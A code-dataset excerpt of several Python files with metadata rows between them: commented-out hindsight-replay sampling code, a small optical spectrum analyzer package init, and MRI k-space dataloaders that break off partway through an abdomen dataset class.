# ##PUT THIS IN POLICIES.PY TO SEE IF SHOULD TRAIN POLICY OR NOT, COMPUTATIONALLY REALLY INEFFICIENT, FIX
# ##done, but need to find more efficient way
# # if num_candidate_transitions == 0:
# # transitions = {key : np.array([]) for key in episode_batch.keys()}
# # transitions['r'] = np.array([])
# # transitions = {k: transitions[k].reshape(batch_size, *transitions[k].shape[1:])
# # for k in transitions.keys()}
# # return transitions
# # else:
# #proba of picking transition from each episode for sampling, based on ratio of candidate transitions within episode to total num of candidate transitions
# probas = [ep_T / num_candidate_transitions for ep_T in ep_Ts]
# np.random.seed(0)
# #episode of each sampled transition
# episode_idxs = np.sort(np.random.choice(rollout_batch_size,batch_size,p=probas))
# #List denoting how many transitions will be sampled from each corresponding episode according to index
# t_per_ep = [np.sum(episode_idxs == i) for i in range(rollout_batch_size)]
# # print("policy_index", policy_index)
# # print("ep_Ts:", ep_Ts)
# # print("num_cand_trans:", num_candidate_transitions)
# # print(rollout_batch_size)
# # print(batch_size)
# # print("probas:", probas)
# # print("ep_idxs:", episode_idxs)
# # print("t_per_ep:", t_per_ep)
# # TAKE t_per_ep SAMPLE FROM EVERY EP AND LINE UP WITH episode_idxs THEN SHUFFLE TOGETHER FOR USE IN CREATING TRANSITIONS
# t_samples = []
# her_indexes = []
# future_t = []
# future_ag = []
# #TODO: currently using "future" strategy, test against subgoal-based. Also see if explicitly enforcing "final" changes much
# for i in range(rollout_batch_size):
# #calculate relevant info for corresponding episode
# np.random.seed(0)
# t_samps = np.random.randint(ep_Ts[i],size=t_per_ep[i])
# np.random.seed(0)
# her_inds = np.where(np.random.uniform(size=t_per_ep[i]) < future_p)[0]
# np.random.seed(0)
# future_offset = np.random.uniform(size=t_per_ep[i]) * (ep_Ts[i] - t_samps)
# future_offset = future_offset.astype(int)
# her_ind = her_inds.astype(int)
# fut_t = (t_samps + 1 + future_offset)[her_inds]
# fut_ag = episode_batch['ag'][episode_idxs[her_inds], fut_t]
# #TODO: does it matter if this is shuffled or not?
# #shuffle all info together
# # inds = np.arange(t_per_ep[i])
# # np.random.shuffle(inds)
# # t_samps = t_samps[inds]
# # # her_inds = her_inds[inds[her_inds]]
# # fut_t = fut_t[inds[her_inds]]
# # fut_ag = fut_ag[inds[her_inds]]
# #concat to output
# if i == 0:
# t_samples = t_samps.copy()
# her_indexes = her_inds.copy()
# future_t = fut_t.copy()
# future_ag = fut_ag.copy()
# else:
# t_samples = np.concatenate((t_samples,t_samps))
# her_indexes = np.concatenate((her_indexes, her_inds))
# future_t = np.concatenate((future_t, fut_t))
# future_ag = np.concatenate((future_ag,fut_ag))
# transitions = {key: episode_batch[key][episode_idxs, t_samples].copy()
# for key in episode_batch.keys()}
# transitions['g'][her_indexes] = future_ag
# # Reconstruct info dictionary for reward computation.
# info = {}
# for key, value in transitions.items():
# if key.startswith('info_'):
# info[key.replace('info_', '')] = value
# # Re-compute reward since we may have substituted the goal.
# reward_params = {k: transitions[k] for k in ['ag_2', 'g']}
# reward_params['info'] = info
# transitions['r'] = reward_fun(**reward_params)
# transitions = {k: transitions[k].reshape(batch_size, *transitions[k].shape[1:])
# for k in transitions.keys()}
# assert(transitions['u'].shape[0] == batch_size_in_transitions)
# return transitions
# import pickle
# def make_sample_her_transitions(replay_strategy, replay_k, reward_fun, policy_index):
# """Creates a sample function that can be used for HER experience replay.
# Args:
# replay_strategy (in ['future', 'none']): the HER replay strategy; if set to 'none',
# regular DDPG experience replay is used
# replay_k (int): the ratio between HER replays and regular replays (e.g. k = 4 -> 4 times
# as many HER replays as regular replays are used)
# reward_fun (function): function to re-compute the reward with substituted goals
# """
# if replay_strategy == 'future':
# future_p = 1 - (1. / (1 + replay_k))
# else: # 'replay_strategy' == 'none'
# future_p = 0
# def _sample_her_transitions(episode_batch, batch_size_in_transitions):
# transitions1 = _sample_her_transitions_orig(episode_batch, batch_size_in_transitions, future_p, replay_k, reward_fun, policy_index)
# transitions2 = _sample_her_transitions_subgoal(episode_batch, batch_size_in_transitions, future_p, replay_k, reward_fun, policy_index)
# for thing1, thing2 in zip(transitions1.values(),transitions2.values()):
# # print(thing1==thing2)
# same = True
# for t1,t2 in zip(thing1,thing2):
# # print(t1)
# if not (t1==t2).all():
# same = False
# # print(t1,t2)
# if not same:
# pickle.dump(episode_batch, open("example_diff_episode.pkl", "wb"))
# print(10/0)
# print("equal")
# return transitions1
# return _sample_her_transitions
| 45.871795
| 161
| 0.61962
| 3,282
| 25,046
| 4.502438
| 0.085009
| 0.04507
| 0.025986
| 0.034242
| 0.971645
| 0.964539
| 0.956892
| 0.956892
| 0.956892
| 0.956892
| 0
| 0.008086
| 0.264314
| 25,046
| 545
| 162
| 45.955963
| 0.793878
| 0.82596
| 0
| 0.044444
| 0
| 0
| 0.00871
| 0
| 0
| 0
| 0
| 0.00367
| 0.022222
| 1
| 0.044444
| false
| 0
| 0.044444
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
79af0e8fdecfc8e568a82ab1b06855e242bc6b3a
| 135
|
py
|
Python
|
pyOSA/__init__.py
|
gregmoille/InstrumentControl
|
4cc8477e36f7c4ad4bf4f54036fdd8dd985b4133
|
[
"MIT"
] | 3
|
2018-05-02T20:14:15.000Z
|
2020-10-18T03:57:09.000Z
|
pyOSA/__init__.py
|
gregmoille/InstrumentControl
|
4cc8477e36f7c4ad4bf4f54036fdd8dd985b4133
|
[
"MIT"
] | 1
|
2019-05-23T15:21:08.000Z
|
2019-05-23T15:21:08.000Z
|
pyOSA/__init__.py
|
gregmoille/InstrumentControl
|
4cc8477e36f7c4ad4bf4f54036fdd8dd985b4133
|
[
"MIT"
] | 2
|
2019-05-16T20:36:25.000Z
|
2020-09-22T18:26:49.000Z
|
from .yokogawa import Yokogawa
# from .yokogawa import Yokogawa
from ._ui_OSAjupyter import uiOSA
from ._OSA_Jupyter import OSAjupyter
| 27
| 36
| 0.837037
| 18
| 135
| 6.055556
| 0.444444
| 0.220183
| 0.330275
| 0.477064
| 0.513761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125926
| 135
| 4
| 37
| 33.75
| 0.923729
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
30e3518d8bdb2f1459aa3df9dd7436b0eee48297
| 29,516
|
py
|
Python
|
dataloaders.py
|
utcsilab/csgm-mri-langevin
|
91e0a5ac658feaf6460045706ef16dd140894374
|
[
"MIT"
] | 32
|
2021-08-08T00:45:03.000Z
|
2022-03-16T08:26:42.000Z
|
dataloaders.py
|
d-dimos/csgm-mri-langevin
|
91e0a5ac658feaf6460045706ef16dd140894374
|
[
"MIT"
] | 2
|
2021-11-18T17:59:48.000Z
|
2022-03-05T14:49:49.000Z
|
dataloaders.py
|
d-dimos/csgm-mri-langevin
|
91e0a5ac658feaf6460045706ef16dd140894374
|
[
"MIT"
] | 4
|
2021-09-24T00:02:42.000Z
|
2022-03-25T00:07:36.000Z
|
from scipy.ndimage.interpolation import rotate,zoom
from torch.utils.data import Dataset, DataLoader
import glob
import os
import numpy as np
import torch
from tqdm import tqdm
import h5py
import sigpy as sp
from utils import get_mvue
import pickle as pkl
from xml.etree import ElementTree as ET
import sys
class MVU_Estimator_Brain(Dataset):
    """fastMRI-style brain slice dataset.

    Each item loads one slice of multi-coil k-space ('kspace') and its
    sensitivity maps ('s_maps') from HDF5 files with matching basenames,
    resizes both to ``image_size``, builds the MVUE image via ``get_mvue``,
    and applies a phase-encode undersampling mask derived from
    ``R``/``pattern``/``orientation``.
    """

    def __init__(self, file_list, maps_dir, input_dir,
                 project_dir='./',
                 R=1,
                 image_size=(384,384),
                 acs_size=26,
                 pattern='random',
                 orientation='vertical'):
        # Attributes
        # NOTE(review): acs_size is accepted but never stored on this class;
        # the ACS width is recomputed from R inside __getitem__.
        self.project_dir = project_dir
        self.file_list = file_list
        self.maps_dir = maps_dir
        self.input_dir = input_dir
        self.image_size = image_size
        self.R = R
        self.pattern = pattern
        self.orientation = orientation

        # Access meta-data of each scan to get number of slices
        # (opens every file once here, so __len__/__getitem__ need no extra I/O
        # for the slice count)
        self.num_slices = np.zeros((len(self.file_list,)), dtype=int)
        for idx, file in enumerate(self.file_list):
            input_file = os.path.join(self.input_dir, os.path.basename(file))
            with h5py.File(os.path.join(self.project_dir, input_file), 'r') as data:
                self.num_slices[idx] = int(np.array(data['kspace']).shape[0])

        # Create cumulative index for mapping a flat slice index to its scan
        self.slice_mapper = np.cumsum(self.num_slices) - 1 # Counts from '0'

    def __len__(self):
        return int(np.sum(self.num_slices)) # Total number of slices from all scans

    # Phase encode random mask generator
    def _get_mask(self, acs_lines=30, total_lines=384, R=1, pattern='random'):
        """Return a 1-D 0/1 mask over ``total_lines`` phase-encode lines.

        Keeps ``acs_lines`` centered auto-calibration lines, then adds outer
        lines ('random' choice or 'equispaced' stride R) so that roughly
        ``total_lines / R`` lines are sampled overall.

        Raises:
            NotImplementedError: for any other ``pattern``.
        """
        # Overall sampling budget
        num_sampled_lines = np.floor(total_lines / R)

        # Get locations of ACS lines
        # !!! Assumes k-space is even sized and centered, true for fastMRI
        center_line_idx = np.arange((total_lines - acs_lines) // 2,
                             (total_lines + acs_lines) // 2)

        # Find remaining candidates
        outer_line_idx = np.setdiff1d(np.arange(total_lines), center_line_idx)
        if pattern == 'random':
            # Sample remaining lines from outside the ACS at random
            random_line_idx = np.random.choice(outer_line_idx,
                       size=int(num_sampled_lines - acs_lines), replace=False)
        elif pattern == 'equispaced':
            # Sample equispaced lines
            # !!! Only supports integer for now
            random_line_idx = outer_line_idx[::int(R)]
        else:
            raise NotImplementedError('Mask pattern not implemented')

        # Create a mask and place ones at the right locations
        mask = np.zeros((total_lines))
        mask[center_line_idx] = 1.
        mask[random_line_idx] = 1.

        return mask

    # Cropping utility - works with numpy / tensors
    def _crop(self, x, wout, hout):
        """Center-crop the last two axes of ``x`` to (wout, hout)."""
        w, h = x.shape[-2:]
        x1 = int(np.ceil((w - wout) / 2.))
        y1 = int(np.ceil((h - hout) / 2.))
        return x[..., x1:x1+wout, y1:y1+hout]

    def __getitem__(self, idx):
        """Return a sample dict (mvue, maps, masked k-space 'ground_truth',
        mask, scale_factor, scan/slice indices, source file) for flat slice
        index ``idx``."""
        # Convert to numerical
        if torch.is_tensor(idx):
            idx = idx.tolist()

        # Get scan and slice index
        # First scan for which index is in the valid cumulative range
        scan_idx = int(np.where((self.slice_mapper - idx) >= 0)[0][0])
        # Offset from cumulative range
        slice_idx = int(idx) if scan_idx == 0 else \
            int(idx - self.slice_mapper[scan_idx] + self.num_slices[scan_idx] - 1)

        # Load maps for specific scan and slice
        maps_file = os.path.join(self.maps_dir,
                                 os.path.basename(self.file_list[scan_idx]))
        with h5py.File(os.path.join(self.project_dir, maps_file), 'r') as data:
            # Get maps
            maps = np.asarray(data['s_maps'][slice_idx])

        # Load raw data for specific scan and slice
        raw_file = os.path.join(self.input_dir,
                                os.path.basename(self.file_list[scan_idx]))
        with h5py.File(os.path.join(self.project_dir, raw_file), 'r') as data:
            # Get k-space for this slice
            gt_ksp = np.asarray(data['kspace'][slice_idx])

        # Crop extra lines and reduce FoV in phase-encode
        gt_ksp = sp.resize(gt_ksp, (
            gt_ksp.shape[0], gt_ksp.shape[1], self.image_size[1]))

        # Reduce FoV by half in the readout direction
        # (resize in image space along readout, then transform back)
        gt_ksp = sp.ifft(gt_ksp, axes=(-2,))
        gt_ksp = sp.resize(gt_ksp, (gt_ksp.shape[0], self.image_size[0],
                                    gt_ksp.shape[2]))
        gt_ksp = sp.fft(gt_ksp, axes=(-2,)) # Back to k-space

        # Crop extra lines and reduce FoV in phase-encode
        # (maps get the identical resize pipeline so they stay aligned)
        maps = sp.fft(maps, axes=(-2, -1)) # These are now maps in k-space
        maps = sp.resize(maps, (
            maps.shape[0], maps.shape[1], self.image_size[1]))

        # Reduce FoV by half in the readout direction
        maps = sp.ifft(maps, axes=(-2,))
        maps = sp.resize(maps, (maps.shape[0], self.image_size[0],
                                maps.shape[2]))
        maps = sp.fft(maps, axes=(-2,)) # Back to k-space
        maps = sp.ifft(maps, axes=(-2, -1)) # Finally convert back to image domain

        # find mvue image
        mvue = get_mvue(gt_ksp.reshape((1,) + gt_ksp.shape), maps.reshape((1,) + maps.shape))

        # !!! Removed ACS-based scaling if handled on the outside
        scale_factor = 1.

        # Scale data
        mvue = mvue / scale_factor
        gt_ksp = gt_ksp / scale_factor

        # Compute ACS size based on R factor and sample size
        total_lines = gt_ksp.shape[-1]
        if 1 < self.R <= 6:
            # Keep 8% of center samples
            acs_lines = np.floor(0.08 * total_lines).astype(int)
        else:
            # Keep 4% of center samples
            acs_lines = np.floor(0.04 * total_lines).astype(int)

        # Get a mask
        mask = self._get_mask(acs_lines, total_lines,
                              self.R, self.pattern)

        # Mask k-space
        if self.orientation == 'vertical':
            gt_ksp *= mask[None, None, :]
        elif self.orientation == 'horizontal':
            gt_ksp *= mask[None, :, None]
        else:
            raise NotImplementedError

        ## name for mvue file
        mvue_file = os.path.join(self.input_dir,
                                 os.path.basename(self.file_list[scan_idx]))
        # Output
        sample = {
            'mvue': mvue,
            'maps': maps,
            'ground_truth': gt_ksp,
            'mask': mask,
            'scale_factor': scale_factor,
            # Just for feedback
            'scan_idx': scan_idx,
            'slice_idx': slice_idx,
            'mvue_file': mvue_file}
        return sample
class MVU_Estimator_Knees(Dataset):
    """fastMRI-style knee slice dataset.

    Like the brain variant, but the slice count per scan is parsed from the
    'ismrmrd_header' XML, and near-empty (dead) k-space lines are removed
    before resizing.
    """

    def __init__(self, file_list, maps_dir, input_dir,
                 project_dir='./',
                 R=1,
                 image_size=(320, 320),
                 acs_size=26,
                 pattern='random',
                 orientation='vertical'):
        # Attributes
        self.project_dir = project_dir
        self.file_list = file_list
        self.acs_size = acs_size
        self.maps_dir = maps_dir
        self.input_dir = input_dir
        self.R = R
        self.image_size = image_size
        self.pattern = pattern
        self.orientation = orientation

        # Access meta-data of each scan to get number of slices
        self.num_slices = np.zeros((len(self.file_list,)), dtype=int)
        for idx, file in enumerate(self.file_list):
            raw_file = os.path.join(self.input_dir, os.path.basename(file))
            with h5py.File(os.path.join(self.project_dir, raw_file), 'r') as data:
                value = data['ismrmrd_header'][()]
                value = ET.fromstring(value)
                # NOTE(review): positional walk into the ISMRMRD header XML;
                # presumably the max slice index element — fragile, verify
                # against the header schema if files change.
                self.num_slices[idx] = int(value[4][2][3][1].text) + 1

        # Create cumulative index for mapping a flat slice index to its scan
        self.slice_mapper = np.cumsum(self.num_slices) - 1 # Counts from '0'

    def __len__(self):
        return int(np.sum(self.num_slices)) # Total number of slices from all scans

    # Phase encode random mask generator
    def _get_mask(self, acs_lines=30, total_lines=384, R=1, pattern='random'):
        """Return a 1-D 0/1 mask over ``total_lines`` phase-encode lines.

        Keeps ``acs_lines`` centered auto-calibration lines, then adds outer
        lines ('random' choice or 'equispaced' stride R) so that roughly
        ``total_lines / R`` lines are sampled overall.
        """
        # Overall sampling budget
        num_sampled_lines = np.floor(total_lines / R)

        # Get locations of ACS lines
        # !!! Assumes k-space is even sized and centered, true for fastMRI
        center_line_idx = np.arange((total_lines - acs_lines) // 2,
                             (total_lines + acs_lines) // 2)

        # Find remaining candidates
        outer_line_idx = np.setdiff1d(np.arange(total_lines), center_line_idx)
        if pattern == 'random':
            # Sample remaining lines from outside the ACS at random
            random_line_idx = np.random.choice(outer_line_idx,
                       size=int(num_sampled_lines - acs_lines), replace=False)
        elif pattern == 'equispaced':
            # Sample equispaced lines
            # !!! Only supports integer for now
            random_line_idx = outer_line_idx[::int(R)]
        else:
            raise NotImplementedError('Mask Pattern not implemented yet...')

        # Create a mask and place ones at the right locations
        mask = np.zeros((total_lines))
        mask[center_line_idx] = 1.
        mask[random_line_idx] = 1.

        return mask

    def _knees_remove_zeros(self, kimage):
        """Delete phase-encode lines whose total energy is ~0.

        Removes an even number of dead lines (balanced around the center) so
        the k-space stays centered.
        """
        # Compute sum-energy of lines
        # !!! This is because some lines are near-empty
        line_energy = np.sum(np.square(np.abs(kimage)),
                             axis=(0, 1))
        dead_lines = np.where(line_energy < 1e-12)[0] # Sufficient for FP32

        # Always remove an even number of lines
        # NOTE(review): 160 is a hard-coded center line index — assumes the
        # raw knee readout is 320 wide; confirm for other acquisitions.
        dead_lines_front = np.sum(dead_lines < 160)
        dead_lines_back = np.sum(dead_lines > 160)
        if np.mod(dead_lines_front, 2):
            dead_lines = np.delete(dead_lines, 0)
        if np.mod(dead_lines_back, 2):
            dead_lines = np.delete(dead_lines, -1)

        # Remove dead lines completely
        k_image = np.delete(kimage, dead_lines, axis=-1)

        return k_image

    # Cropping utility - works with numpy / tensors
    def _crop(self, x, wout, hout):
        """Center-crop the last two axes of ``x`` to (wout, hout)."""
        w, h = x.shape[-2:]
        x1 = int(np.ceil((w - wout) / 2.))
        y1 = int(np.ceil((h - hout) / 2.))
        return x[..., x1:x1+wout, y1:y1+hout]

    def __getitem__(self, idx):
        """Return a sample dict (mvue, maps, masked k-space 'ground_truth',
        mask, scale_factor, scan/slice indices, source file) for flat slice
        index ``idx``."""
        # Convert to numerical
        if torch.is_tensor(idx):
            idx = idx.tolist()

        # Get scan and slice index
        # First scan for which index is in the valid cumulative range
        scan_idx = int(np.where((self.slice_mapper - idx) >= 0)[0][0])
        # Offset from cumulative range
        slice_idx = int(idx) if scan_idx == 0 else \
            int(idx - self.slice_mapper[scan_idx] + self.num_slices[scan_idx] - 1)

        # Load maps for specific scan and slice
        maps_file = os.path.join(self.maps_dir,
                                 os.path.basename(self.file_list[scan_idx]))
        with h5py.File(os.path.join(self.project_dir, maps_file), 'r') as data:
            # Get maps
            maps = np.asarray(data['s_maps'][slice_idx])

        # Load raw data for specific scan and slice
        raw_file = os.path.join(self.input_dir,
                                os.path.basename(self.file_list[scan_idx]))
        with h5py.File(os.path.join(self.project_dir, raw_file), 'r') as data:
            # Get k-space for this slice
            gt_ksp = np.asarray(data['kspace'][slice_idx])
            gt_ksp = self._knees_remove_zeros(gt_ksp)

        # Crop extra lines and reduce FoV by half in readout
        gt_ksp = sp.resize(gt_ksp, (
            gt_ksp.shape[0], gt_ksp.shape[1], self.image_size[1]))

        # Reduce FoV by half in the readout direction
        gt_ksp = sp.ifft(gt_ksp, axes=(-2,))
        gt_ksp = sp.resize(gt_ksp, (gt_ksp.shape[0], self.image_size[0],
                                    gt_ksp.shape[2]))
        gt_ksp = sp.fft(gt_ksp, axes=(-2,)) # Back to k-space

        # Crop extra lines and reduce FoV by half in readout
        # (maps get the identical resize pipeline so they stay aligned)
        maps = sp.fft(maps, axes=(-2, -1)) # These are now maps in k-space
        maps = sp.resize(maps, (
            maps.shape[0], maps.shape[1], self.image_size[1]))

        # Reduce FoV by half in the readout direction
        maps = sp.ifft(maps, axes=(-2,))
        maps = sp.resize(maps, (maps.shape[0], self.image_size[0],
                                maps.shape[2]))
        maps = sp.fft(maps, axes=(-2,)) # Back to k-space
        maps = sp.ifft(maps, axes=(-2, -1)) # Finally convert back to image domain

        # find mvue image
        mvue = get_mvue(gt_ksp.reshape((1,) + gt_ksp.shape), maps.reshape((1,) + maps.shape))

        # # Load MVUE slice from specific scan
        mvue_file = os.path.join(self.input_dir,
                                 os.path.basename(self.file_list[scan_idx]))

        # !!! Removed ACS-based scaling if handled on the outside
        scale_factor = 1.

        # Scale data
        mvue = mvue / scale_factor
        gt_ksp = gt_ksp / scale_factor

        # Compute ACS size based on R factor and sample size
        total_lines = gt_ksp.shape[-1]
        if 1 < self.R <= 6:
            # Keep 8% of center samples
            acs_lines = np.floor(0.08 * total_lines).astype(int)
        else:
            # Keep 4% of center samples
            acs_lines = np.floor(0.04 * total_lines).astype(int)

        # Get a mask
        mask = self._get_mask(acs_lines, total_lines,
                              self.R, self.pattern)

        # Mask k-space
        if self.orientation == 'vertical':
            gt_ksp *= mask[None, None, :]
        elif self.orientation == 'horizontal':
            gt_ksp *= mask[None, :, None]
        else:
            raise NotImplementedError

        # Output
        sample = {
            'mvue': mvue,
            'maps': maps,
            'ground_truth': gt_ksp,
            'mask': mask,
            'scale_factor': scale_factor,
            # Just for feedback
            'scan_idx': scan_idx,
            'slice_idx': slice_idx,
            'mvue_file': mvue_file}
        return sample
class MVU_Estimator_Stanford_Knees(Dataset):
    """Stanford knee dataset where each HDF5 file already contains k-space,
    sensitivity maps, and per-slice masks — no mask generation or resizing is
    done here; the stored mask is applied directly.
    """

    def __init__(self, file_list, maps_dir, input_dir,
                 project_dir='./',
                 R=1,
                 image_size=(320,320),
                 acs_size=26,
                 pattern='random',
                 orientation='vertical'):
        # Attributes
        # NOTE(review): R/image_size/pattern/orientation are stored but not
        # used in __getitem__ below; masks come pre-computed from the file.
        self.project_dir = project_dir
        self.acs_size = acs_size
        self.maps_dir = maps_dir
        self.input_dir = input_dir
        self.R = R
        self.image_size = image_size
        self.pattern = pattern
        self.orientation = orientation
        self.file_list = sorted(file_list)
        if len(self.file_list) == 0:
            raise IOError('No image files found in the specified path')

        # Access meta-data of each scan to get number of slices
        # self.maps_file = os.path.join(maps_dir, 'Stanford-Knee-Axial-Selected.h5')
        # self.raw_file = os.path.join(input_dir, 'Stanford-Knee-Axial-Selected.h5')
        # with h5py.File(os.path.join(self.project_dir, self.raw_file), 'r') as data:
        #     self.num_slices = np.array(data['kspace']).shape[0]

    @property
    def num_slices(self):
        # NOTE(review): this property re-opens and reads every HDF5 file on
        # each access, and it is accessed from __len__ and __getitem__ —
        # consider caching if this shows up in profiling.
        num_slices = np.zeros((len(self.file_list,)), dtype=int)
        for idx, file in enumerate(self.file_list):
            with h5py.File(os.path.join(self.project_dir, file), 'r') as data:
                num_slices[idx] = np.array(data['kspace']).shape[0]
        return num_slices

    @property
    def slice_mapper(self):
        # Cumulative index for mapping a flat slice index to its scan
        # (recomputed per access; see note on num_slices)
        return np.cumsum(self.num_slices) - 1 # Counts from '0'

    def __len__(self):
        return int(np.sum(self.num_slices)) # Total number of slices from all scans

    def __getitem__(self, idx):
        """Return a sample dict (mvue, maps, masked k-space 'ground_truth',
        mask, scale_factor, scan/slice indices, source file) for flat slice
        index ``idx``."""
        # Convert to numerical
        if torch.is_tensor(idx):
            idx = idx.tolist()

        # Get scan and slice index
        # First scan for which index is in the valid cumulative range
        scan_idx = int(np.where((self.slice_mapper - idx) >= 0)[0][0])
        # Offset from cumulative range
        slice_idx = int(idx) if scan_idx == 0 else \
            int(idx - self.slice_mapper[scan_idx] + self.num_slices[scan_idx] - 1)

        # Load specific slice from specific scan
        with h5py.File(os.path.join(self.project_dir, self.file_list[scan_idx]), 'r') as data:
            # Get maps, kspace, masks
            gt_ksp = np.asarray(data['kspace'])[slice_idx]
            maps = np.asarray(data['s_maps'])[slice_idx]
            mask = np.asarray(data['masks'])[slice_idx]

        # find mvue image
        mvue = get_mvue(gt_ksp.reshape((1,) + gt_ksp.shape), maps.reshape((1,) + maps.shape))

        # # Load MVUE slice from specific scan
        mvue_file = os.path.join(self.input_dir,
                                 os.path.basename(self.file_list[scan_idx]))

        # !!! Removed ACS-based scaling if handled on the outside
        scale_factor = 1.

        # Scale data
        mvue = mvue / scale_factor
        gt_ksp = gt_ksp / scale_factor

        # apply mask (broadcast over the coil axis)
        gt_ksp *= mask[None, :, :]

        # Output
        sample = {
            'mvue': mvue,
            'maps': maps,
            'ground_truth': gt_ksp,
            'mask': mask,
            'scale_factor': scale_factor,
            # Just for feedback
            'scan_idx': scan_idx,
            'slice_idx': slice_idx,
            'mvue_file': mvue_file}
        return sample
# class MVU_Estimator_Stanford_Knees(Dataset):
# def __init__(self, maps_dir, input_dir,
# project_dir='./',
# R=1,
# image_size=(320,320),
# acs_size=26,
# pattern='random',
# orientation='vertical'):
# # Attributes
# self.project_dir = project_dir
# self.acs_size = acs_size
# self.maps_dir = maps_dir
# self.input_dir = input_dir
# self.R = R
# self.image_size = image_size
# self.pattern = pattern
# self.orientation = orientation
# # Access meta-data of each scan to get number of slices
# self.num_slices = np.ones(18, dtype=int)
# self.maps_file = os.path.join(maps_dir, 'Stanford_maps_rotated.h5')
# self.raw_file = os.path.join(input_dir, 'Stanford_knees.pkl')
# def __len__(self):
# return int(np.sum(self.num_slices)) # Total number of slices from all scans
# # Phase encode random mask generator
# def _get_mask(self, acs_lines=30, total_lines=384, R=1, pattern='random'):
# # Overall sampling budget
# num_sampled_lines = np.floor(total_lines / R)
# # Get locations of ACS lines
# # !!! Assumes k-space is even sized and centered, true for fastMRI
# center_line_idx = np.arange((total_lines - acs_lines) // 2,
# (total_lines + acs_lines) // 2)
# # Find remaining candidates
# outer_line_idx = np.setdiff1d(np.arange(total_lines), center_line_idx)
# if pattern == 'random':
# # Sample remaining lines from outside the ACS at random
# random_line_idx = np.random.choice(outer_line_idx,
# size=int(num_sampled_lines - acs_lines), replace=False)
# elif pattern == 'equispaced':
# # Sample equispaced lines
# # !!! Only supports integer for now
# random_line_idx = outer_line_idx[::int(R)]
# else:
# raise NotImplementedError('Mask Pattern not implemented yet...')
# # Create a mask and place ones at the right locations
# mask = np.zeros((total_lines))
# mask[center_line_idx] = 1.
# mask[random_line_idx] = 1.
# return mask
# # Cropping utility - works with numpy / tensors
# def _crop(self, x, wout, hout):
# w, h = x.shape[-2:]
# x1 = int(np.ceil((w - wout) / 2.))
# y1 = int(np.ceil((h - hout) / 2.))
# return x[..., x1:x1+wout, y1:y1+hout]
# def _rotatecomplex(self, a,angle,reshape=True):
# r = rotate(a.real,angle,reshape=reshape,mode='wrap')
# i = rotate(a.imag,angle,reshape=reshape,mode='wrap')
# return r+1j*i
# def __getitem__(self, idx):
# # Convert to numerical
# if torch.is_tensor(idx):
# idx = idx.tolist()
# # Load maps for specific scan and slice
# with h5py.File(os.path.join(self.project_dir, self.maps_file), 'r') as data:
# # Get maps
# maps = np.asarray(data[f'ge{idx+1}.h5'])
# # Load raw data for specific scan and slice
# with open(os.path.join(self.project_dir, self.raw_file), 'rb') as f:
# # Get maps
# data = pkl.load(f)
# slice_ksp = np.asarray(data[f'ge{idx+1}.h5']['kspace'])
# # rotate kspace by 90 degrees
# gt_ksp = slice_ksp.copy()
# for c,coil in enumerate(slice_ksp):
# gt_ksp[c,:,:] = self._rotatecomplex(coil,90) # the kspace is rotated, so werotate it back to the original format
# # find mvue image
# mvue = get_mvue(gt_ksp.reshape((1,) + gt_ksp.shape), maps.reshape((1,) + maps.shape))
# # # Load MVUE slice from specific scan
# mvue_file = os.path.join(self.input_dir,f'ge{idx+1}.h5')
# # !!! Removed ACS-based scaling if handled on the outside
# scale_factor = 1.
# # Scale data
# mvue = mvue / scale_factor
# gt_ksp = gt_ksp / scale_factor
# # Compute ACS size based on R factor and sample size
# total_lines = gt_ksp.shape[-1]
# if 1 < self.R <= 6:
# # Keep 8% of center samples
# acs_lines = np.floor(0.08 * total_lines).astype(int)
# else:
# # Keep 4% of center samples
# acs_lines = np.floor(0.04 * total_lines).astype(int)
# # Get a mask
# mask = self._get_mask(acs_lines, total_lines,
# self.R, self.pattern)
# # Mask k-space
# if self.orientation == 'vertical':
# gt_ksp *= mask[None, None, :]
# elif self.orientation == 'horizontal':
# gt_ksp *= mask[None, :, None]
# else:
# raise NotImplementedError
# # Output
# sample = {
# 'mvue': mvue,
# 'maps': maps,
# 'ground_truth': gt_ksp,
# 'mask': mask,
# 'scale_factor': scale_factor,
# # Just for feedback
# 'scan_idx': 1,
# 'slice_idx': idx+1,
# 'mvue_file': mvue_file}
# return sample
class MVU_Estimator_Abdomen(Dataset):
    """Abdomen dataset backed by a single HDF5 pair ('data2.h5' in both
    maps_dir and input_dir). Optionally rotates each coil's k-space by 90
    degrees, pads readout/phase-encode to ``image_size``, builds the MVUE
    image, and applies an undersampling mask.
    """

    def __init__(self, maps_dir, input_dir,
                 project_dir='./',
                 R=1,
                 image_size=(158,320),
                 acs_size=26,
                 pattern='random',
                 rotate=True,
                 orientation='vertical'):
        # Attributes
        # NOTE(review): the `rotate` parameter shadows the scipy `rotate`
        # function imported at module level within this scope; it is stored
        # as self.rotate, so no conflict at call time, but renaming would be
        # clearer.
        self.project_dir = project_dir
        self.acs_size = acs_size
        self.maps_dir = maps_dir
        self.input_dir = input_dir
        self.R = R
        self.image_size = image_size
        self.pattern = pattern
        self.orientation = orientation
        self.rotate = rotate

        # Access meta-data of each scan to get number of slices
        self.maps_file = os.path.join(self.project_dir, maps_dir, 'data2.h5')
        self.raw_file = os.path.join(self.project_dir, input_dir, 'data2.h5')
        with h5py.File(self.raw_file, 'r') as f:
            self.num_slices = np.array(f['ksp']).shape[0]

    def __len__(self):
        return self.num_slices # Total number of slices from all scans

    # Phase encode random mask generator
    def _get_mask(self, acs_lines=30, total_lines=384, R=1, pattern='random'):
        """Return a 1-D 0/1 mask over ``total_lines`` phase-encode lines.

        Keeps ``acs_lines`` centered auto-calibration lines, then adds outer
        lines ('random' choice or 'equispaced' stride R) so that roughly
        ``total_lines / R`` lines are sampled overall.
        """
        # Overall sampling budget
        num_sampled_lines = np.floor(total_lines / R)

